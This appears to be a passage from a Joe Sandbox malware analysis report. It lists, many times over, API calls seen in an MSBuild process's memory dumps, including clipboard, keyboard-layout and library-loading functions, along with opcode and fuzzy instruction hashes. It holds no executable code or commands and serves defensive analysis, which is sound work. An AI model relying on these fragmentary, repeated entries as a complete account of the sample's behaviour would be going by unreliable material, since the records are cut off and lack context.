                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 234171B0B1020AAFCB05DF69D89099EBBF6FF88710B108129E405EB754DB31ED05CB94
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0153C83E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01536039
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01536039
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Clipboard
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 220874293-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                                                • API String ID: 0-1010288
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Clipboard
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 220874293-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153EF57
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(?,?,?,?), ref: 0727E85D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153EF57
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0727156E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 071C065E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: KeyboardLayout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 194098044-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0727156E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0747CF25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674878063.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7470000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0153C83E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0747CF25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674878063.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7470000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 071C065E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: KeyboardLayout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 194098044-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 88bb9b7a54f2ddd5316fb7e265353cee85b5e29db51f25987984c3e030b558aa
                                                                                                                                                                                                                                                • Instruction ID: 63625293e24a6bee2997991160e88690214b9f13274ae212c7dee2dca0720fc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88bb9b7a54f2ddd5316fb7e265353cee85b5e29db51f25987984c3e030b558aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21A3B1A00259EFCB25CFA4C884EEE7BF9EF88310F148165E915D7251D734E950CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 074702b62172718a64aa5483e625f5459ec2a9e9912eb934624afb441d69add1
                                                                                                                                                                                                                                                • Instruction ID: 141cc0975f4b6d4dac35792b9dc24602f8d4f087039d847349fe2da032ec72b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 074702b62172718a64aa5483e625f5459ec2a9e9912eb934624afb441d69add1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E09235B4E40208EFEB259FA0D959BEDBB32FB48305F10C059EA496B7C0CA7A5945DF11
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7538907e6c93e59067acac053ba8a306effc8bdc20c1cc0af65237005740a610
                                                                                                                                                                                                                                                • Instruction ID: bace24d41153adfb18e2827ad0beacf86ec3e490087b282aa46d026c68868f9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7538907e6c93e59067acac053ba8a306effc8bdc20c1cc0af65237005740a610
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 919235B4E40208EFEB259FA0D959BADBB32FB48305F10C059EA496B7C0CB7A5945DF11
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4e77559f39118af22356dc718e08d5379a883be1facdec0d67da3b2ceb0b507b
                                                                                                                                                                                                                                                • Instruction ID: 882224b0bd8c340b8e0d117ee98e76821eb95a8aaf03267fdd3103b99660eb0c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e77559f39118af22356dc718e08d5379a883be1facdec0d67da3b2ceb0b507b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B72BC30B003148FDB25DBA4D864AAE7BB2BFC6711F404A59D1069F391CBB5ED09CB96
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a82fa9497471ac1218e798afe934b85381d7f970d4b20d001967f992fbcfd9f
                                                                                                                                                                                                                                                • Instruction ID: 4e528399190ad758206bbf814fce404d6401a83413653b0e070a64d97cf6040e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a82fa9497471ac1218e798afe934b85381d7f970d4b20d001967f992fbcfd9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1420374B002189FDB54CF68C994EAEBBF6BF89700F10809AE506DB3A5DA71ED45CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 46a5eeea2f51117afd93069a8081dca87464679a6bbde20088aaeb1ff800922a
                                                                                                                                                                                                                                                • Instruction ID: 6b9dcabf71e65ba3636856c04ba2b4f97d08997ca1591c011b0d032320bde516
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a5eeea2f51117afd93069a8081dca87464679a6bbde20088aaeb1ff800922a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41328034B402148FDB249B24C994EEEB7B2EB89315F10C19AEA0A5F751CB71ED85CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d96839a3b1c9ae30fc9b1dc933211dd7689d81777bf9098e109a9d4450b0506d
                                                                                                                                                                                                                                                • Instruction ID: f3f646165a0de860abdc6894d3372efb3aff2bc3ec30867d9913c05469d72068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d96839a3b1c9ae30fc9b1dc933211dd7689d81777bf9098e109a9d4450b0506d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 373258B47006018FDB54DF39C898A6ABBF2FF89710B1585A9E506CB362DB30EC45CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4f76ec6f564f8740314a2623d7b4b5be552c3c38627834b492e7845be67e0778
                                                                                                                                                                                                                                                • Instruction ID: c701828da2037ef102cc24d6d71ccb4585c377375c8b3bf739b1e2aee3fa15fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f76ec6f564f8740314a2623d7b4b5be552c3c38627834b492e7845be67e0778
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0302CEB1B14341AFD711CF68C580AAABBF6FF85310F19849AD54ADB652C730EC85CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce3c629293e5aba5990ac85ce1ad16defc48f83beec23cddc7005f48fac34763
                                                                                                                                                                                                                                                • Instruction ID: 29ee7afd23bc4264dc2e2b467230aa5b50102e5efe99d6ff244ce5c8490800cb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce3c629293e5aba5990ac85ce1ad16defc48f83beec23cddc7005f48fac34763
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D2258B5600706DFCB25DF64D5849AABBF2FF88310B158A68E4568B791DB34EC52CF80
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd0969ed3326be780a49d176cd972db3a1b631478c03d36b7b6863407a7f99c3
                                                                                                                                                                                                                                                • Instruction ID: 19bf7584efca1e666af3b28c82c64ba047774f1ca4909feba6ea9b275dad1973
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd0969ed3326be780a49d176cd972db3a1b631478c03d36b7b6863407a7f99c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92913DF07183029BEBB56B36996436A62ABAFC5741B1884399A03CF7C4DF35DC418F61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5982f228d16eca1d3666e8f5da2ce483c6ec3f7c307edd9f30bc7b133d0a2e76
                                                                                                                                                                                                                                                • Instruction ID: 97e8eb48e65faed580a2b7dda08140349a6a6eadb7254be9ef3074ab7141147b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5982f228d16eca1d3666e8f5da2ce483c6ec3f7c307edd9f30bc7b133d0a2e76
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA16F35B002049FDB44CF68D994EAABBF2FF89711B1580AAE905EF361DA31EC05CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 861abd03ad14ce2c6e329cc63fd56cc8348699491731f10b6927f019a8b2f694
                                                                                                                                                                                                                                                • Instruction ID: c12859032c1344df15679a5054e1044869f1289f276490de5d6ab2b08f2e1342
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 861abd03ad14ce2c6e329cc63fd56cc8348699491731f10b6927f019a8b2f694
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 268172F073530BEF9B2596B594287BA77D7BB86B10B1C44A5C502DF6A0DF60CC028B66
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 866e90b482d09992506bd8330ad079a97d092ad98210de40ee666c0ef8fb51ae
                                                                                                                                                                                                                                                • Instruction ID: 4731e78b12ac058ffbc14851d0fc7b0e893ef364674c577415bcc58aac15c466
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 866e90b482d09992506bd8330ad079a97d092ad98210de40ee666c0ef8fb51ae
